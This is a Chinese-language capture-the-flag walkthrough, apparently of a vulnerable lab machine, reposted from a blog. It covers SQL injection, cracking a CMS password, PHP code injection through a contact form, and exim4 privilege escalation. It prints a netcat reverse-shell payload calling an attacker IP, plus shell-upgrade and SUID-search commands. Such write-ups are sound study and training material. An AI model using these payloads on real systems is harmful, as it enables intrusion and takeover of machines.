1
WEB
刚进来就找到了处SQL注入
找到了貌似是登录用户的用户名和密码。
使用john破解密码,虽然没有爆出admin的密码,但是爆出了john的密码:turtle。
发现下方标记的CMS,查找到后台地址。
登录进去后查找相关信息,找到一个图片上传的点,但是暂时没有办法利用,又在contact us处找到了可疑的提交点,更改test format选项为PHP code,看看会有什么反应。
保存设置后无任何回显,提交表单也没有回显信息,根据提示猜测应该是直接执行,用php反弹shell,提交表单后得到shell。
<p>lalala<p>system("nc -e /bin/bash 192.168.16.131 4444");
2
提权
然后用python获得交互式shell。
python -c 'import pty;pty.spawn("/bin/bash")'
查找SUID。
find / -perm -4000 2>/dev/null 
没有认识的,网上找复现发现exim4存在提权漏洞,查看版本是4.89,然后搜索一下漏洞。
发现漏洞编号46996,将文件拖下来,搜索可以写入的文件夹。
find / -writable -type d 2>/dev/null(直接把文件拖出来会报错,查明原因是文件格式不对,把结束符替换即可)
sed -i -e 's/\r$//' 123.sh
成功上传文件。
根据exploit-db提示进行提权,共有两种方法。
拿到flag。
本文分享自微信公众号 - 小啦的学习笔记(woshiguolala)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/3896378/blog/4427624